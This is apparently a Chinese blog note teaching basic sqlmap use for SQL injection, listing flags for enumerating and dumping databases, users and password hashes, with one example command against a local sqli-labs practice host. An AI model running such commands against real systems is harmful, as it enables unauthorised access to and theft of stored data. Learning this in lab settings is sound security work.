sql注入——sqlmap的基础使用

sqlmap简介:

      sqlmap是一个自动化sql注入工具,主要功能是发现并且利用给定URL进行SQL注入。

sqlmap常用参数: 

     -u "注入url"    #指定url

b9faeb47a658418cae7916d3fe3cf36f.png

    -m 文件名        #获取多个url

    -r  文件名         #从文件中获取http请求

1397b6857a304e4495ecb18a807043aa.png

    -l  文件名          #从日志文件中获取目标

0b4a13dd8ba24d3db3d387007e1ff8b7.png

 

     --users                     # 获取数据库用户

     --passwords               #获取数据库用户密码

     --current-user             #获取当前数据库用户名称

     --cookie    “”               #设置cookie

     --data                        #设置post请求参数

     -p

       --dbs              #获取数据库

199b8e9767544252a6b4eb8fc9b1bd54.png

从sqli/less-1获取到的服务器数据库列表。

sql注入——sqlmap的基础使用_第1张图片

-D  数据库                  #指定数据库

    --tables                      # 获取表

sqlmap -u http://192.168.1.121/sqli/less-1/?id=1 -D security --tables

sql注入——sqlmap的基础使用_第2张图片

    -T 表名                     #指定表

    --columns                 #获取字段名

25f83b421ade46dbbc49d56ea3d04f78.png

 sql注入——sqlmap的基础使用_第3张图片

-C  字段                         #获取列名

     --dump                       #获取数据30e222d6792d47958d846b7c57023438.png

sql注入——sqlmap的基础使用_第4张图片
 

 

你可能感兴趣的:(hacker笔记,sql,mybatis,数据库)